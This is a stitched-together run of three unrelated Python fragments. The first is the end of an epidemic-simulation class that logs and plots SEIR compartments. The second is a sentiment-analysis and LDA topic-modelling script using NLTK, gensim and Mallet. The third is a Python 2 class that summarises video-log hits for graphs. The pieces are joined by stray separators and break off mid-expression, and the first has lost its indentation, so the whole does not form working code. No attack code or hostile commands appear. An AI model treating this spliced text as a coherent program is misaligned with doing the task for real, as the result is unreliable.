f"{groupName}_undetected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] +
self.nodeGroupData[groupName]['numI'][self.time_detected],
f"{groupName}_infected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] +
self.nodeGroupData[groupName]['numI'][self.time_detected] +
self.nodeGroupData[groupName]['numD_E'][self.time_detected] +
self.nodeGroupData[groupName]['numD_I'][self.time_detected],
f"{groupName}_totUndetected1st": log[f"{groupName}_totE_tillFirst"] + log[
f"{groupName}_totI_tillFirst"],
f"{groupName}_meanUndetected1st": (log[f"{groupName}_totE_tillFirst"] + log[
f"{groupName}_totI_tillFirst"]) / self.tseries[self.time_detected] if self.time_detected else 0
})
time1st = self.tseries[self.time_detected]
log.update({
"totInfected": log["totE"] + log["totI"] + log["totD_E"] + log["totD_I"],
"maxInfected": numpy.max(self.numE + self.numI + self.numD_E + self.numD_I),
"finInfected": log["finE"] + log["finI"] + log["finD_E"] + log["finD_I"],
"totUndetected": log["totE"] + log["totI"],
"meanUndetectedInfectiousDays": log["totI"] / self.t,
"meanUndetected": (log["totE"] + log["totI"]) / self.t,
"undetected1st": self.numE[self.time_detected] + self.numI[self.time_detected],
"infected1st": self.numE[self.time_detected] + self.numI[self.time_detected] + self.numD_E[
self.time_detected] + self.numD_I[self.time_detected],
"totUndetected1st": log["totE_tillFirst"] + log["totI_tillFirst"],
"meanUndetected1st": (log["totE_tillFirst"] + log["totI_tillFirst"]) / self.tseries[
self.time_detected] if self.time_detected else 0,
"meanTests": log["totTests"] / self.t,
"finUndetected": log["finE"] + log["finI"],
"overall_infected": self.numNodes - log["finS"]})
# compute baseline risk if the workplace was closed.
mean_p_extern = numpy.mean(self.p_extern) if isinstance(self.p_extern, (list, numpy.ndarray)) else self.p_extern
gamma = numpy.mean(self.gamma) if isinstance(self.gamma, (list, numpy.ndarray)) else self.gamma
base_risk = mean_p_extern / gamma
log["excessRisk"] = 100 * (log["totI"] / (self.t * self.numNodes) - base_risk) / base_risk if base_risk else 0
return log
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
def plot(self, ax=None, plot_S='line', plot_E='line', plot_I='line', plot_R='line', plot_F='line',
plot_D_E='line', plot_D_I='line', combine_D=True,
color_S='tab:green', color_E='orange', color_I='crimson', color_R='tab:blue', color_F='black',
color_D_E='mediumorchid', color_D_I='mediumorchid', color_reference='#E0E0E0',
dashed_reference_results=None, dashed_reference_label='reference',
shaded_reference_results=None, shaded_reference_label='reference',
vlines=[], vline_colors=[], vline_styles=[], vline_labels=[],
ylim=None, xlim=None, legend=True, title=None, side_title=None, plot_percentages=True, plot_tested=True):
import matplotlib.pyplot as pyplot
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Create an Axes object if None provided:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (not ax):
fig, ax = pyplot.subplots()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Prepare data series to be plotted:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fseries = self.numF / self.numNodes if plot_percentages else self.numF
Eseries = self.numE / self.numNodes if plot_percentages else self.numE
Dseries = (self.numD_E + self.numD_I) / self.numNodes if plot_percentages else (self.numD_E + self.numD_I)
D_Eseries = self.numD_E / self.numNodes if plot_percentages else self.numD_E
D_Iseries = self.numD_I / self.numNodes if plot_percentages else self.numD_I
Iseries = self.numI / self.numNodes if plot_percentages else self.numI
Rseries = self.numR / self.numNodes if plot_percentages else self.numR
Sseries = self.numS / self.numNodes if plot_percentages else self.numS
Testseries = self.numTested / self.numNodes if plot_percentages else self.numTested
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# Draw tested fraction
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (plot_tested):
# average over 3 days
# temp = [0] * (int(self.t/3) +2)
# for id in range(self.tidx):
# temp[int(self.tseries[id]/3)] += Testseries[id]
# for id in range(self.tidx):
# Testseries[id] = temp[int(self.tseries[id]/3)]/3
# ax.plot(self.tseries, Testseries,color='grey', linestyle='--', label ='tested', zorder=1)
ax.fill_between(numpy.ma.masked_where(Testseries <= 0, self.tseries),
numpy.ma.masked_where(Testseries <= 0, Testseries), color='grey', label='tested', alpha=0.4,
zorder=4)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Draw the reference data:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (dashed_reference_results):
dashedReference_tseries = dashed_reference_results.tseries[::int(self.numNodes / 100)]
dashedReference_IDEstack = (
dashed_reference_results.numI + dashed_reference_results.numD_I + dashed_reference_results.numD_E + dashed_reference_results.numE)[
::int(self.numNodes / 100)] / (self.numNodes if plot_percentages else 1)
ax.plot(dashedReference_tseries, dashedReference_IDEstack, color='#E0E0E0', linestyle='--',
label='$I+D+E$ (' + dashed_reference_label + ')', zorder=0)
if (shaded_reference_results):
shadedReference_tseries = shaded_reference_results.tseries
shadedReference_IDEstack = (
shaded_reference_results.numI + shaded_reference_results.numD_I + shaded_reference_results.numD_E + shaded_reference_results.numE) / (
self.numNodes if plot_percentages else 1)
ax.fill_between(shaded_reference_results.tseries, shadedReference_IDEstack, 0, color='#EFEFEF',
label='$I+D+E$ (' + shaded_reference_label + ')', zorder=0)
ax.plot(shaded_reference_results.tseries, shadedReference_IDEstack, color='#E0E0E0', zorder=1)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Draw the stacked variables:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
topstack = numpy.zeros_like(self.tseries)
if (any(Fseries) and plot_F == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Fseries <= 0, self.tseries),
numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), topstack, color=color_F, alpha=0.5,
label='$F$', zorder=2)
ax.plot(numpy.ma.masked_where(Fseries <= 0, self.tseries),
numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), color=color_F, zorder=3)
topstack = topstack + Fseries
if (any(Eseries) and plot_E == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Eseries <= 0, self.tseries),
numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), topstack, color=color_E, alpha=0.5,
label='$E$', zorder=2)
ax.plot(numpy.ma.masked_where(Eseries <= 0, self.tseries),
numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), color=color_E, zorder=3)
topstack = topstack + Eseries
if (combine_D and plot_D_E == 'stacked' and plot_D_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Dseries <= 0, self.tseries),
numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), topstack, color=color_D_E,
alpha=0.5, label='$D_{all}$', zorder=2)
ax.plot(numpy.ma.masked_where(Dseries <= 0, self.tseries),
numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), color=color_D_E, zorder=3)
topstack = topstack + Dseries
else:
if (any(D_Eseries) and plot_D_E == 'stacked'):
ax.fill_between(numpy.ma.masked_where(D_Eseries <= 0, self.tseries),
numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), topstack, color=color_D_E,
alpha=0.5, label='$D_E$', zorder=2)
ax.plot(numpy.ma.masked_where(D_Eseries <= 0, self.tseries),
numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), color=color_D_E, zorder=3)
topstack = topstack + D_Eseries
if (any(D_Iseries) and plot_D_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(D_Iseries <= 0, self.tseries),
numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), topstack, color=color_D_I,
alpha=0.5, label='$D_I$', zorder=2)
ax.plot(numpy.ma.masked_where(D_Iseries <= 0, self.tseries),
numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), color=color_D_I, zorder=3)
topstack = topstack + D_Iseries
if (any(Iseries) and plot_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Iseries <= 0, self.tseries),
numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), topstack, color=color_I, alpha=0.5,
label='$I$', zorder=2)
ax.plot(numpy.ma.masked_where(Iseries <= 0, self.tseries),
numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), color=color_I, zorder=3)
topstack = topstack + Iseries
if (any(Rseries) and plot_R == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Rseries <= 0, self.tseries),
numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), topstack, color=color_R, alpha=0.5,
label='$R$', zorder=2)
ax.plot(numpy.ma.masked_where(Rseries <= 0, self.tseries),
numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), color=color_R, zorder=3)
topstack = topstack + Rseries
if (any(Sseries) and plot_S == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Sseries <= 0, self.tseries),
numpy.ma.masked_where(Sseries <= | |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 13:41:14 2019
@author: Emmett & Binyang
"""
from pprint import pprint
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from nltk.tokenize.punkt import PunktSentenceTokenizer, PunktTrainer
##Let’s first build a corpus to train our tokenizer on. We’ll use stuff available in NLTK:
from nltk.corpus import gutenberg
# print (dir(gutenberg))
# print (gutenberg.fileids())
# Concatenate the raw text of every Gutenberg corpus file into a single
# training string for the Punkt sentence tokenizer.
text = "".join(gutenberg.raw(file_id) for file_id in gutenberg.fileids())
print(len(text))
##a funtion that converts a list to a string
def listToString(s):
    """Concatenate an iterable of strings into a single string.

    Replaces the original manual ``+=`` accumulation loop (quadratic in
    the worst case) with the idiomatic, linear-time ``str.join``.
    Behavior is unchanged for every list of strings.
    """
    return "".join(s)
##extract sentences from samples for following sentiment analysis
# Train the Punkt sentence tokenizer ONCE. The original re-trained it on
# the same Gutenberg text inside the loop, repeating the identical,
# expensive training for each of the 185 sample files.
trainer = PunktTrainer()
trainer.INCLUDE_ALL_COLLOCS = True
trainer.train(text)
tokenizer = PunktSentenceTokenizer(trainer.get_params())
##Adding more abbreviations
tokenizer._params.abbrev_types.add('dr')
sent_df = pd.DataFrame()
i = 0  # running row index across all samples
sampNum = 1
while (sampNum < 186):
    # Read the whole sample file as one string; "with" closes the handle
    # promptly (the original never closed it).
    with open("sample" + str(sampNum) + ".txt", "r") as fileOpen:
        temp = listToString(fileOpen.readlines())
    # One dataframe row per tokenized sentence. The loop variable is
    # renamed: the original's "for sent in sent" shadowed the sentence
    # list with each sentence string.
    for sentence in tokenizer.tokenize(temp):
        sent_df.loc[i, 'sent'] = sentence
        sent_df.loc[i, 'sample'] = sampNum
        i += 1
    sampNum += 1
##NLTK’s built-in Vader Sentiment Analyzer will simply rank a piece of text as positive, negative or neutral
##using a lexicon of positive and negative words.
##We can utilize this tool by first creating a Sentiment Intensity Analyzer (SIA) to categorize our headlines,
##then we'll use the polarity_scores method to get the sentiment.
##We'll append each sentiment dictionary to a results list, which we'll transform into a dataframe:
from nltk.sentiment.vader import SentimentIntensityAnalyzer as SIA
# Score every sentence with VADER and write the four polarity components
# (negative / neutral / positive / compound) back onto its dataframe row.
sia = SIA()
results = []
for idx, row in sent_df.iterrows():
    score = sia.polarity_scores(row['sent'])
    for component in ('neg', 'neu', 'pos', 'compound'):
        sent_df.loc[idx, component] = score.get(component)
# pprint(results[:10], width=100)
##We will consider posts with a compound value greater than 0.2 as positive and less than -0.2 as negative.
##There's some testing and experimentation that goes with choosing these ranges, and there is a trade-off to be
##made here. If you choose a higher value, you might get more compact results (less false positives and false
##negatives), but the size of the results will decrease significantly.
# Discretize the compound score into sentiment labels: 1 = positive,
# -1 = negative, 0 = neutral.
# NOTE(review): the prose above says +/-0.2, but the code uses +/-0.3 --
# confirm which threshold was intended.
sent_df['label'] = 0
sent_df.loc[sent_df['compound'] > 0.3, 'label'] = 1
sent_df.loc[sent_df['compound'] < -0.3, 'label'] = -1
# sent_df.head()
##We have all the data we need to save, so let's do that:
# mode='a' appends on every run, so repeated executions accumulate
# (possibly duplicate) rows in the csv.
sent_df.to_csv('sentiment analysis.csv', mode='a', encoding='utf-8', index=False)
##We can now keep appending to this csv, but just make sure that if you reassign the headlines set, you could get
##duplicates. Maybe add a more advanced saving function that reads and removes duplicates before saving.
#Let's first take a peek at a few positive and negative headlines:
print("Positive headlines:\n")
pprint(list(sent_df[sent_df['label'] == 1].sent)[:5], width=200)
print("\nNegative headlines:\n")
pprint(list(sent_df[sent_df['label'] == -1].sent)[:5], width=200)
##Now let's check how many total positives and negatives we have in this dataset:
# value_counts() gives raw counts; normalize=True gives fractions,
# scaled here to percentages.
print(sent_df.label.value_counts())
print(sent_df.label.value_counts(normalize=True) * 100)
##The first line gives us raw value counts of the labels, whereas the second line provides percentages
##with the normalize keyword.
##For fun, let's plot a bar chart:
"""
fig, ax = plt.subplots(figsize=(8, 8))
counts = sent_df.label.value_counts(normalize=True) * 100
sns.barplot(x=counts.index, y=counts, ax=ax)
ax.set_xticklabels(['Negative', 'Neutral', 'Positive'])
ax.set_ylabel("Percentage")
plt.show()
"""
##filter the sentences by number of words in it
# Adds a 'len_sent' column holding the whitespace-token count of each
# sentence. (NOTE: built row-by-row via .loc, so pandas may store it as
# float64 rather than int -- verify if downstream code compares types.)
for idx, row in sent_df.iterrows():
    sentence = row['sent']
    sent_df.loc[idx, 'len_sent'] = len(sentence.split())
##split positive and other sentences
# 'pos' = sentences labeled positive (1); 'neg' = everything else,
# i.e. neutral AND negative rows alike.
pos = sent_df[sent_df['label'] == 1]
neg = sent_df[sent_df['label'] != 1]
import gensim
from gensim.parsing.preprocessing import strip_non_alphanum
from gensim.parsing.preprocessing import strip_punctuation
from gensim.parsing.preprocessing import strip_multiple_whitespaces
from gensim.parsing.preprocessing import stem_text
def _clean_sentences(rows):
    """Return one cleaned, stemmed string per row of *rows*.

    Pipeline: drop non-alphanumeric characters, strip punctuation,
    collapse repeated whitespace, then stem the sentence. Extracted into
    a helper because the original duplicated this exact loop three times
    (full / positive / negative corpora).
    """
    cleaned = []
    for _, row in rows.iterrows():
        stripped = strip_non_alphanum(str(row['sent']))
        no_punct = strip_punctuation(stripped)
        collapsed = strip_multiple_whitespaces(no_punct)
        cleaned.append(stem_text(collapsed))
    return cleaned

# One cleaned corpus per sentiment split.
corpus_full = _clean_sentences(sent_df)
corpus_pos = _clean_sentences(pos)
corpus_neg = _clean_sentences(neg)
from nltk.corpus import stopwords
stop_words = stopwords.words('english')
# Hand-tuned stoplist: apostrophe-stripped English stopwords, single
# letters, digits, plus domain/stemmed tokens (e.g. 'flight', 'plane',
# 'thei', 'wa') that presumably dominated earlier topic-model runs --
# TODO confirm the rationale for the domain terms with the authors.
stoplist = set('a about above after again against all am an and any are arent\
as also at be because been before being below between both but\
by cant cannot could couldnt did didnt do does doesnt doing dont\
down during each els few for from further had hadnt has have havent\
having he hed hes her here heres hers herself him himself his\
how hows i id ill im ive if in into is isnt it its itself lets\
me more most mustnt my myself no nor not of off on once only or\
other ought our ours ourselves out over own same shant she shes\
should shouldnt so some such than that thats the their theirs\
them themselves then there theres these they theyd theyll theyre\
theyve this those through to too under until up very was wasnt\
we wed were weve were werent what whats when whens which while\
who whos whom why whys with wont would wouldnt you youd youll\
youre youve your yours yourself yourselves ll ve s ar mayb ha re\
us thi isn a b c d e f g h i j k l m n o p q r s t u v w x y z\
hi will can get back go don wa let atc ok ani mi thei whenev make\
just take aw know sai good baltimor jetblu lol thank thanks like\
vari might less highest billion nice probabl lot fuck shit sure\
feel dure befor realli work veri chanc see awai onc onli dy aren\
100 someth thing even happen becaus wai everi much help want think\
fear flight plane fly mai time dai\
1 2 3 4 5 6 7 8 9 10'.split())
print (len(stoplist))
# Merge NLTK's standard English stopwords into the custom stoplist.
stoplist.update(stop_words)
print(len(stop_words))
print(len(stoplist))
#standardize text -- makes all characters lowercase and removes common stop words
def _strip_stopwords(documents):
    # One lowercased, stoplist-filtered token list per document.
    return [[word for word in document.lower().split() if word not in stoplist]
            for document in documents]

text_full = _strip_stopwords(corpus_full)
print(text_full)
text_pos = _strip_stopwords(corpus_pos)
text_neg = _strip_stopwords(corpus_neg)
#count number of times that word appears in corpus
#pair frequency with respective word in new array
from collections import defaultdict

def _drop_hapaxes(texts):
    """Remove tokens that occur only once across *texts*.

    Counts token frequencies over the whole corpus, then filters every
    document down to tokens seen more than once. Extracted into a helper
    because the original duplicated this count-then-filter pass three
    times (full / positive / negative corpora).
    """
    frequency = defaultdict(int)
    for text in texts:
        for token in text:
            frequency[token] += 1
    return [[token for token in text if frequency[token] > 1] for text in texts]

corpus_removeOne_full = _drop_hapaxes(text_full)
corpus_removeOne_pos = _drop_hapaxes(text_pos)
corpus_removeOne_neg = _drop_hapaxes(text_neg)
from gensim import corpora
#add corpora to dictionary
# One token<->integer-id Dictionary per corpus.
dictionary_full = corpora.Dictionary(corpus_removeOne_full)
dictionary_pos = corpora.Dictionary(corpus_removeOne_pos)
dictionary_neg = corpora.Dictionary(corpus_removeOne_neg)
#save dictionary for future reference
dictionary_full.save('redditTest_full.dict')
dictionary_pos.save('redditTest_pos.dict') #location of document in computer
dictionary_neg.save('redditTest_neg.dict')
#dict = gensim.corpora.Dictionary.load('redditTest.dict')
#assign numeric id to each token in dictionary
dictID_full = dictionary_full.token2id
dictID_pos = dictionary_pos.token2id
dictID_neg = dictionary_neg.token2id
#remove empty sentences
# Rebind each corpus to a filtered copy. The previous code called
# list.remove() while iterating the same list, which skips the element
# that follows every removal, so consecutive empty documents survived.
# Building a new list removes them all and is correct.
corpus_removeOne_full = [text for text in corpus_removeOne_full if len(text) > 0]
corpus_removeOne_pos = [text for text in corpus_removeOne_pos if len(text) > 0]
corpus_removeOne_neg = [text for text in corpus_removeOne_neg if len(text) > 0]
#converts each word into vector following same process as example
#Bag of Word Corpus of Full Sentiment
# Sparse (token_id, count) vectors, serialized to Matrix Market format.
bow_corpus_full = [dictionary_full.doc2bow(text) for text in corpus_removeOne_full]
corpora.MmCorpus.serialize('redditTest_full.mm', bow_corpus_full)
# NOTE(review): bare `gensim` name -- assumes `import gensim` ran earlier
# in the script; confirm.
corp_full = gensim.corpora.MmCorpus('redditTest_full.mm')
from gensim import models
# Fit TF-IDF on the *full*-sentiment corpus. Renamed from `tfidf_pos`
# (a copy-paste slip: that name belongs to the positive-corpus model
# built below, and was reassigned there before any other use).
tfidf_full = models.TfidfModel(bow_corpus_full)
corpus_tfidf_full = tfidf_full[bow_corpus_full]
#Bag of Word Corpus of Positive Sentiment
bow_corpus_pos = [dictionary_pos.doc2bow(text) for text in corpus_removeOne_pos]
corpora.MmCorpus.serialize('redditTest_pos.mm', bow_corpus_pos)
corp_pos = gensim.corpora.MmCorpus('redditTest_pos.mm')
from gensim import models
# TF-IDF weighting for the positive corpus.
tfidf_pos = models.TfidfModel(bow_corpus_pos)
corpus_tfidf_pos = tfidf_pos[bow_corpus_pos]
#Bag of Word Corpus of Negative Sentiment
bow_corpus_neg = [dictionary_neg.doc2bow(text) for text in corpus_removeOne_neg]
corpora.MmCorpus.serialize('redditTest_neg.mm', bow_corpus_neg)
corp_neg = gensim.corpora.MmCorpus('redditTest_neg.mm')
from gensim import models
# TF-IDF weighting for the negative corpus.
tfidf_neg = models.TfidfModel(bow_corpus_neg)
corpus_tfidf_neg = tfidf_neg[bow_corpus_neg]
#LDA Mallet for full corpus
# Train a 9-topic LDA model via the external Mallet binary for each of
# the three corpora. Hyperparameters are identical across corpora and
# random_seed is pinned, so the topic fits are repeatable.
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_full = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_full, num_topics=9, id2word=dictionary_full, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_full = lda_full[bow_corpus_full]
lda_full.print_topics(9)
#LDA Mallet for positive corpus
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_pos = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_pos, num_topics=9, id2word=dictionary_pos, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_pos = lda_pos[bow_corpus_pos]
lda_pos.print_topics(9)
#LDA Mallet for negative corpus
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_neg = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_neg, num_topics=9, id2word=dictionary_neg, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_neg = lda_neg[bow_corpus_neg]
lda_neg.print_topics(9)
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from sklearn.manifold import TSNE
# NOTE(review): `np` is used below -- assumes `import numpy as np` ran
# earlier in the script; confirm.
colors = np.array([color for name, color in mcolors.TABLEAU_COLORS.items()])
#t-SNE plot for full corpus
n_topics = 9
# Build a dense document x topic weight matrix from the sparse LDA output.
topic_weights_full = []
for row_list in lda_full[bow_corpus_full]:
    tmp = np.zeros(n_topics)
    for i, w in row_list:
        tmp[i] = w
    topic_weights_full.append(tmp)
# NOTE(review): fillna(9) looks like a typo for fillna(0) -- a missing
# topic weight should presumably be zero, and 9 would dominate argmax.
arr_full = pd.DataFrame(topic_weights_full).fillna(9).values
topic_num_full = np.argmax(arr_full, axis=1)
# NOTE(review): random_state=None makes the embedding non-reproducible
# even though the LDA fits above pin random_seed -- confirm intent.
tsne_model_full = TSNE(n_components=3, random_state=None, method='barnes_hut',
                       angle=0.5, init='pca')
tsne_lda_full = tsne_model_full.fit_transform(arr_full)
# Map ASCII digits to Unicode subscripts for the axis labels.
sub = str.maketrans("0123456789", "₀₁₂₃₄₅₆₇₈₉")
plt.xlabel('t-SNE1'.translate(sub))
plt.ylabel('t-SNE2'.translate(sub))
plt.title('t-SNE Plot of Topics | |
the
referer hostname (domains).
"""
keys = self.referer_host_hits.keys()
keys.sort(lambda x, y: cmp(self.referer_host_hits[y],
self.referer_host_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
return keys
class Summary(dict):
    """
    A dictionary of SummaryItems that represents a total summary of all
    files contained in the log. This object provides special methods for
    retrieving keys sorted on particular criteria, such as the most hits
    or longest average elapsed time.

    NOTE: written for Python 2 -- dict.keys() is treated as a list and
    list.sort() is called with a cmp-style comparison function.
    """
    def __init__(self):
        """
        Initialize dictionary, set sane defaults, clear all caches.
        """
        dict.__init__(self)
        self.pos = 0  # presumably the resume offset in the log -- not used in this chunk
        self.common_prefix_len = 0  # length of the path prefix shared by all file keys
        self.ip_hits = {}  # ip address -> hit count
        self.agent_hits = {}  # user agent string -> hit count
        self.referer_hits = {}  # referer URL -> hit count
        self.referer_host_hits = {}  # referer hostname -> hit count
        self.reset_caches()
        self.version = VERSION  # module-level VERSION constant
        self.clients = {}  # client -> hit count (see keys_clients)
        self.versions = {}  # client version info -- not used in this chunk
    def reset_caches(self):
        """
        Clear all caches so that they are recalculated when sorted keys
        are requested. This should be called whenever the summary is
        updated with new information so that new caches are generated
        that take this new information into account.
        """
        self._keys_hits = None
        self._keys_elapsed_avg = None
        self._keys_percent_watched = None
        self._keys_ip_hits = None
        self._keys_agent_hits = None
        self._keys_referer_hits = None
        self._keys_referer_host_hits = None
        self._keys_clients = None
    def calculate_common_prefix(self):
        """
        Recalculate the common prefix length that all files share. This
        should be called whenever the summary object is updated from the
        log file. The common prefix length is used when returning file
        titles and names for simplifying their display in graphs and
        tables.
        """
        prefix = None
        if len(self) > 1:
            for key in self:
                if prefix == None:
                    # First key seeds the candidate prefix.
                    prefix = key
                else:
                    # Shrink the candidate to the longest leading slice of
                    # this key that it still starts with.
                    for x in range(len(key), -1, -1):
                        if prefix.startswith(key[:x]):
                            prefix = key[:x]
                            break
                    if prefix == "":
                        # Nothing in common; no point scanning further.
                        break
        elif len(self) == 1:
            # A single file: its directory counts as the shared prefix.
            prefix = os.path.dirname(self.keys()[0]) + "/"
        if prefix:
            self.common_prefix_len = len(prefix)
        else:
            self.common_prefix_len = 0
    def keys_hits(self):
        """
        Return a list of keys sorted by the total number of hits per file,
        sorted from most hits to fewest.
        """
        if self._keys_hits:
            return self._keys_hits
        # Python 2: dict.keys() returns a list; cmp-sort descending by hits.
        keys = self.keys()
        keys.sort(lambda x, y: cmp(self[y].hits, self[x].hits))
        #keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_hits = keys
        return keys
    def keys_hits_titles(self):
        """
        Return a list of keys sorted by the total number of hits per file,
        with each element either the title of the video (if available) or
        the file name of the video minus any common prefix that all file
        names have in common.
        """
        # and/or ternary: prefer the title, else the prefix-stripped path.
        return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_hits()]
    def keys_elapsed_avg(self):
        """
        Return a list of keys sorted by the average elapsed time per file,
        sorted from longest to shortest.
        """
        if self._keys_elapsed_avg:
            return self._keys_elapsed_avg
        keys = self.keys()
        keys.sort(lambda x, y: cmp(self[y].elapsed_avg, self[x].elapsed_avg))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_elapsed_avg = keys
        return keys
    def keys_elapsed_avg_titles(self):
        """
        Return a list of keys sorted by the average_elapsed time per file,
        with each element either the title of the video (if available) or
        the file name of the video minus any common prefix that all file
        names have in common.
        """
        return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_elapsed_avg()]
    def keys_percent_watched(self):
        """
        Return a list of keys sorted by the percent of the file that was
        watched, sorted from highest to lowest.
        """
        if self._keys_percent_watched:
            return self._keys_percent_watched
        keys = self.keys()
        keys.sort(lambda x, y: cmp(self[y].percent_watched, self[x].percent_watched))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_percent_watched = keys
        return keys
    def keys_percent_watched_titles(self):
        """
        Return a list of keys sorted by the percent of the file that was
        watched, with each element either the title of the video (if
        available) or the file name of the video minus any common prefix
        that all file names have in common.
        """
        return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_percent_watched()]
    def keys_ip_hits(self):
        """
        Return a list of IPs, sorted by the number of hits per IP, from
        highest to lowest.
        """
        if self._keys_ip_hits:
            return self._keys_ip_hits
        keys = self.ip_hits.keys()
        keys.sort(lambda x, y: cmp(self.ip_hits[y], self.ip_hits[x]))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_ip_hits = keys
        return keys
    def keys_referer_hits(self):
        """
        Return a list of referers, sorted by the number of hits per referer,
        from highest to lowest.
        """
        if self._keys_referer_hits:
            return self._keys_referer_hits
        keys = self.referer_hits.keys()
        keys.sort(lambda x, y: cmp(self.referer_hits[y], self.referer_hits[x]))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_referer_hits = keys
        return keys
    def keys_referer_host_hits(self):
        """
        Return a list of referer hosts, sorted by the number of hits per
        referer, from highest to lowest.
        """
        if self._keys_referer_host_hits:
            return self._keys_referer_host_hits
        keys = self.referer_host_hits.keys()
        keys.sort(lambda x, y: cmp(self.referer_host_hits[y],
                                   self.referer_host_hits[x]))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_referer_host_hits = keys
        return keys
    def keys_agent_hits(self):
        """
        Return a list of user agents, sorted by the number of hits per
        user agent, from highest to lowest.
        """
        if self._keys_agent_hits:
            return self._keys_agent_hits
        keys = self.agent_hits.keys()
        keys.sort(lambda x, y: cmp(self.agent_hits[y], self.agent_hits[x]))
        keys = keys[:GRAPH_ITEMS_MAX]
        self._keys_agent_hits = keys
        return keys
    def keys_hits_by_ip(self, ip):
        """
        Return a tuple of (hits, keys) where hits is a dict corresponding
        to the number of hits per file from a particular ip and keys are
        the keys (file names) sorted by hits in decreasing order.
        """
        # Count one hit per occurrence of *ip* in each file's ip list.
        file_hits = {}
        for filename in self:
            for address in self[filename].ips:
                if address == ip:
                    if filename not in file_hits:
                        file_hits[filename] = 0
                    file_hits[filename] += 1
        top_files_keys = file_hits.keys()
        top_files_keys.sort(lambda x, y: cmp(file_hits[y], file_hits[x]))
        return (file_hits, top_files_keys)
    def keys_hits_by_ip_titles(self, ip):
        """
        Return a list of keys sorted by the number of hits per file, with
        each element either the title of the video (if available) or the
        file name of the video minus any common prefix that all file names
        have in common.
        """
        hits, keys = self.keys_hits_by_ip(ip)
        return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in keys]
    def keys_clients(self):
        """
        Return a list of clients sorted by the number of hits.
        """
        if self._keys_clients:
            return self._keys_clients
        keys = self.clients.keys()
        keys.sort(lambda x, y: cmp(self.clients[y], self.clients[x]))
        self._keys_clients = keys
        return keys
class Graph(graph):
    """
    The default base graph for Simple Stats graphs that defines some
    color and style information and simplifies several methods.

    NOTE(review): `graph` is defined elsewhere (appears to be an Open
    Flash Chart-style base class) -- confirm against the imports.
    """
    def __init__(self, title):
        # Apply the house style: background, grid/label colors, 3D x-axis,
        # and default axis legends.
        graph.__init__(self)
        self.bg_colour = GRAPH_BACKGROUND_COLOR
        self.y_max = 100
        self.title(title)
        self.set_x_axis_3d(12)
        self.x_axis_colour = GRAPH_GRID_COLOR
        self.x_grid_colour = GRAPH_GRID_COLOR
        self.y_axis_colour = GRAPH_GRID_COLOR
        self.y_grid_colour = GRAPH_GRID_COLOR
        self.set_x_label_style(8, GRAPH_LABEL_COLOR, 2)
        self.set_y_label_style(8, GRAPH_LABEL_COLOR)
        self.set_x_legend("Videos")
        self.set_y_legend("Hits")
    def title(self, text):
        # Fixed 20px title rendered in the configured title color.
